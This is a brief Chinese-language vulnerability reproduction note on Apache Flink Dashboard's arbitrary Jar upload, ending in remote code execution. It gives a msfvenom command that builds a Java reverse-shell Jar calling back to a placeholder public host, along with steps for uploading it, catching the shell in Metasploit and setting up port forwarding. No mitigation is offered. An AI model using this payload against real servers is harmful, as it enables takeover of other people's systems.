0X01.漏洞原理
攻擊者可利用該漏洞在 Apache Flink Dashboard頁面中上傳任意Jar包,利用Metasploit在Apache Flink服務器中執行任意代碼,獲取服務器最高權限,所以危害性較大。
0X02.漏洞復現
需要生成一個公網的IP地址exploit才能正常接收到msf反射的shell通道。使用端口轉發工具在內網與公網之間形成映射
有了公網IP,現在可以用這個POC生成Jar包
msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar
上傳jar包后,在msfexploit中Set LHOST,SET PORT后,點擊submit
成功監聽。執行任意LINUX命令
POC中的Lhost,LPort 為公網IP與端口。
MsfExploit中的Lhost Lport為Localhost和與公網端口有映射關系的的本地監聽端口。
0X03.一些問題
1.使用NC監聽失敗,原因未知,msfexploit正常
2.下次嘗試使用端口轉發工具反彈shell